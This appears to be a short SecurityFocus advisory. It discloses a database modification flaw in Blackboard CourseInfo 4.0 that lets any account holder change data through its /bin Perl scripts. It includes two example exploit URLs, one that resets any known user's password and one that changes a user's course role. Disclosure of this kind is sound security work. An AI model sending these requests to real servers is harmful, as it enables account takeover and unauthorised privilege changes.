Blackboard CourseInfo 4.0 Database Modification Vulnerability

Any user who has a valid account on Blackboard CourseInfo is able to modify the database by entering custom form values through any perl script located in /bin and its subdirectories.

For example, the following URL will change the password of any known account:

http://target/bin/common/user_update_passwd.pl?user_id=<value>&firstname=<value>&lastname=<value>&course_id=<value>&password1=<value>&password2=<value>

The URL below will change the status of a user to either a Student (value is "S"), Teacher Assistant (value is "T"), or Instructor (value is "G").

http://target/bin/common/user_update_admin.pl?user_id=<value>&course_id=<value>&role=<value>&available_ind=Y


 

Privacy Statement
Copyright 2010, SecurityFocus